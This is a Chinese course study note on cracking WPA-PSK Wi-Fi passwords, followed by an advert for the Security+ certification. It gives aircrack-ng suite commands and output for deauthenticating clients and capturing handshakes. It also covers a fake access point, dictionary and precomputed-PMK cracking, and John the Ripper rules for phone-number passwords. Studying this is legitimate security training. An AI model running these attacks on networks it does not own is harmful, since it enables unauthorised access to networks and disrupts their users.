【安全牛學習筆記】WPA攻擊
WPA PSK攻擊 只有一種密碼破解方法 WPA不存在WEP的弱點 只能暴力破解 CPU資源 時間 字典質量 網上共享的字典 泄露密碼 地區電話號碼段 Crunch生成字典 kali中自帶的字典文件 |
WPA PSK攻擊 PSK破解過程 啟動monitor 開始抓包並保存 Deauthentication攻擊獲取4步握手信息 使用字典暴力破解 |
[email protected]:~# service network-manager stop
[email protected]:~# airmon-ng check kill
Killing these processes:
FID NAME
989 wpa_supplicant
1025 dhclient
[email protected]:~# airmon-ng start wlan0
NO interfering processes found
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 station mode vif disabled for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# airodump-ng wlan0mon --bssid EC:25:CA:DC:29:B6 -c 11 -w wpa
[email protected]:~# airoplay-ng -0 2 -a EC:25:CA:DC:29:B6 -c 50:3E:34:30:0F:AA wlan0mon
[email protected]:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
[email protected]:~# ls wpa*
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
[email protected]:~# cd /usr/share/john/ 字典目錄
[email protected]:/usr/share/john# ls password.list
[email protected]:/usr/share/john# more password.list
[email protected]:/usr/share/john# grep Password password.list
Password
[email protected]:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap
密碼是Password
[email protected]:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/ general/ Injections/ others/ stress/ vulns/ webservicces/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-playloads/ dbcs/ web-backdoors/ wordlists-user-passwd/
Discovery/ regex/ wordlists-misc/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/ wordlists-user-passwd/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt us_cities.txt wordlist-alpharumeric-case.txt wordlist-common-snmp-community-strings.txt wordlist-dns.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls
john.txt phpbb.txt twltter.txt woksauce.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
[email protected]:~# cd /usr/share/
[email protected]:/usr/share# ls
[email protected]:/usr/share# cd wordlists/
[email protected]:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt Fasttrack.txt fern-wifi metasploit metasploit-jtr namp.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz
[email protected]:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r--r-- 1 root root 53357341 3月 3 2013 rockyou.txt.gz
[email protected]:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r--r-- 1 root root 51M 3月 3 2013 rockyou.txt.gz
[email protected]:/usr/share/wordlists# gunzip rockyou.txt.gz
[email protected]:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt sqlmap.txt terminter.txt wfuzz
[email protected]:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392
[email protected]:/usr/share/wordlists#
aircrack-ng -w rockyou.txt /root/wpa-01.cap
密碼是password
[email protected]:~# airodump-ng --essid kifi wlan0mon
[email protected]:~# airodump-ng --bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa
[email protected]:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
[email protected]:~# grep Password135 /usr/share/wordlists/rockyou.txt
WPA PSK攻擊 無AP情況下的WPA密碼破解 啟動monitor 開始抓包並保存 根據probe信息偽造相同ESSID的AP 抓取四步握手中的前兩個包 使用字典暴力破解 |
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# rm wpa-01.*
[email protected]:~# airodump-ng wlan0man
[email protected]:~# airbase-ng -h
sage: airbase-ng <options> <replay interface>
Options
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to encrypt/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don‘t] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages) (long --verbose)
-M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
-A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID (long --hidden)
-s : force shared key authentication
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte attack (long --caffe-latte)
-N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can‘t be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
Filter options:
--bssid <MAC> : BSSID to filter/use (short -b)
--bssids <file> : read a list of BSSIDs out of that file (short -B)
--client <MAC> : MAC of client to accept (short -d)
--clients <file> : read a list of MACs out of that file (short -D)
--essid <ESSID> : specify a single ESSID (short -e)
--essids <file> : read a list of ESSIDs out of that file (short -E)
Help:
--help: Displays the usage screen (short -H)
[email protected]:~# airbase-ng --essid lcon -c 11 wlan0mon //偽裝AP
18:44:04 Created tap interface at0
18:44:04 Trying to set MTU on at0 to 1500
18:44:04 Trying to set MTU on wlan0mon to 1800
18:44:04 Access point with DSSID C8:3A:35:CA:46:91 started.
[email protected]:~# tnux //分屏
[email protected]:~# airbase --essid kifi -c 11 wlan0mon
[email protected]:~# airbase --essid kifi -c 11 -z 2 wlan0mon
[email protected]:~# airbase --essid kifi -c 11 -Z 4 wlan0mon
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# airodump-ng wlan0mon --essid kifi
[email protected]:~# airodump-ng wlan0mon --essid kifi -w wpa
[email protected]:~# airodump-ng wlan0mon --essid kifi -w wpa -c 11
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
AIROLIB破解密碼 設計用於存儲ESSID和密碼列表 計算生成不變的PMK(計算資源消耗型) PMK在破解階段被用於計算PTK(速度快,計算資源要求少) 通過完整性摘要值破解密碼 SQLlite3數據庫存儲數據 |
AIROLIB破解密碼 echo kifi > essid.txt airolib-ng db --import essid essid.txt airolib-ng db --stats airolib-ng db --import passwd <wordlist> 自動剔除不合格的WPA字典 airolib-ng db --batch 生成PMK aircrack-ng -r db wpa.cap |
[email protected]:~# echo kifi > essid.txt
[email protected]:~# cat essid.txt
kifi
[email protected]:~# airolib-ng db --import essid essid.txt
[email protected]:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 (null)
[email protected]:~# airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt
[email protected]:~# airolib-ng db --import passwd /usr/share/john/passwrod.lst
[email protected]:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 0.0
[email protected]:~# airolib-ng --batch
Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.
[email protected]:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait...
Aircack-ng 1.2 rc2
[email protected]:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt
[email protected]:~# more dict.txt
[email protected]:~# airolib-ng db --import password dict.txt
Reading file
Writing...as read,121538 invalid lines ignored.
Done
[email protected]:~# airolib-ng db --batch
JTR破解密碼 John the ripper 快速的密碼破解軟件 支持基於規則擴展密碼字典 很多人系統用書記號碼做無線密碼 獲取號段並利用JTR規則增加最後幾位的數字 配置文件/etc/john/john.conf [list.Rules:Wordlist] $[0-9]$[0-9]$[0-9] |
[email protected]:~# gedit
[email protected]:~# top //系統的性能
[email protected]:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait...
Aircack-ng 1.2 rc2
[email protected]:~# cat yd.txt
[email protected]:~# vi /etc/john/john.conf
/list.Rules:Wordlist
在最後加上密碼規則
$[0-9]$[0-9]$[0-9]
JTR破解密碼 測試效果 john --wordlist=passwrod.list --rules --stdout | grep -i Password123 破解調用 john --wroldlist=pass.list --rules --stdout | aricrack-ng -e kifi -w - wap.cap 北京聯通手機號密碼破解 |
[email protected]:~# john --wordlist=yd.txt --rules --stdout
[email protected]:~# ls yd.txt -lh
-rw-r--r-- 1 root root 561 11月 10 19:57 yd.txt
[email protected]:~# john --wroldlist=yd.txt --rules --stdout | aricrack-ng -e kifi -w - wap02.cap
該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂
Security+認證為什麽是互聯網+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。
目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試方便、費用適中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。
本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1967653
【安全牛學習筆記】WPA攻擊